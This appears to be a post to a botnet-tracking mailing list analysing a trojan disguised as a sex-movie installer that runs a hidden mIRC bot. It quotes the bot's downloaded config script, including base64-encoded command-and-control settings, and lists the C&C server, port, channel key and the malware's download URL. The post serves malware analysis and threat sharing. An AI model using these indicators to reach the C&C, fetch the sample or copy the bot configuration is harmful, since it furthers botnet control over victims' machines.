To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- I came across a malicious binary via a link to the following: http://82. 38.6.249:5200/sex At this point, it looks like the IP for the malware has changed, I'll let the group know when I discover the new address.
The file installs a program that supposedly allows you to watch sex movies on your PC. Preliminary analysis of the file shows the following: * The program launches what looks to be a legitimate Windows installer program. * Upon completion of the installation, an MIrc client is launched in the background which connects to IRC. * The pcap of the network session shows that a configuration or MIrc scripting file of some kind is grabbed from www.geocities.com/xA1r5/rehaz.htm There are actually 5 locations from which a file can be grabbed www.geocities.com/xA1r?/rehaz.htm , where ? is 1-5 * After wget of the file, the following is noted: za!r /.tmd ZA!r /.rd1 typecon type 3 za!r /.rd1 typecon typed KJlj0OnlkJnkmeljjnkJ908N-kmlOOM;/!tojHNJHN.kmn9ygkl89HB.AtHKJJSDAJDS.KAJD.AS JDcxKJD za!r /.rd1 wcnt 1 4,2 za!r /.rd1 wcnt 2 9,2 za!r /.rd1 wcnt 3 17,1 za!r /.rd1 webcodes posa 5 za!r /.rd1 webcodes webcode5 F!PxAl321r47jKlU57kLW/Ilo0rnbKJjkIjeh7698sfl za!r /.rd1 webcodes webcode4 F!PxAl321r47jKlU47kLW/Ilo0rnbKJjkIjeh7698sfl za!r /.rd1 webcodes webcode3 F!PxAl321r47jKlU37kLW/Ilo0rnbKJjkIjeh7698sfl za!r /.rd1 webcodes webcode2 FokxAl321r47jKlU27ko!/Ilo0rnbKJjkIjeh76fNalz za!r /.rd1 webcodes webcode1 FokxAl321r47jKlU17ko!/Ilo0rnbKJjkIjeh76fNalz za!r /.rd1 cntserv 1 13,1 za!r /.rd1 cntserv 2 8,2 za!r /.rd1 cntserv 3 68,1 za!r /.rd srv LkIwbmUuY29t za!r /.rd prt NTAwNg== za!r /.timer 1 3 $iif(warnet != $network,.server mlks.b0ne.com 5006) * The srv LkIwbmUuY29t and prt NTAwNg== lines appear to be base64 encoded which when decrypted yield .B0ne.com and 5006. This file most likely allows the bot operator to control the MIrc client via the web page file. If he needs to modify the behavior of the client, he can do it via the web page file. * During the launch of the MIrc client on the infected computer, Windows Media player starts and diplays a frame of a sex movie. * The format of the NICK and USER strings do not appear to be random characters as multiple execution runs of the file yielded English words as segments of the USER string, and the NICK strings seemed to have a pattern to them as well. * It does not appear to be possible to properly join the channel unless certain MODE and WATCH commands are passed. I will continue to monitor the bot and study the malware and the config files to try and obtain more information. At this point, the bot is pretty quiet, I have only seen the following command over the past few hours: [WARNET] ( 86.137.160.146:5006) -> :[EMAIL PROTECTED] MODE #.war. -b *!*@ 212.21.* If anyone can shed any further light on the commands shown in the config file above, it would be a huge help. The following is the C&C information I have so far: Server hostname: mlks.b0ne.com Server IP: 86.137.160.146 Port: 5006 Server Password: [none] NICK string: Teh-Wei USER string: Eeke "hotmail.com " "mlks.b0ne.com" :Hi! I'm a human! What are you? Channel: #.War. Channel Key: svcexe Bot population: ~200 Report on Sex_Movies.avi.exe - ******************************************** MD5: e867443d92ae809cc12150375d43bbf2 AVG: No Virus Found BitDefender: No Virus Found ClamAV: Trojan.Muldrop.744 F-Prot: No Virus Found Andre' -- SemperSecurus _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
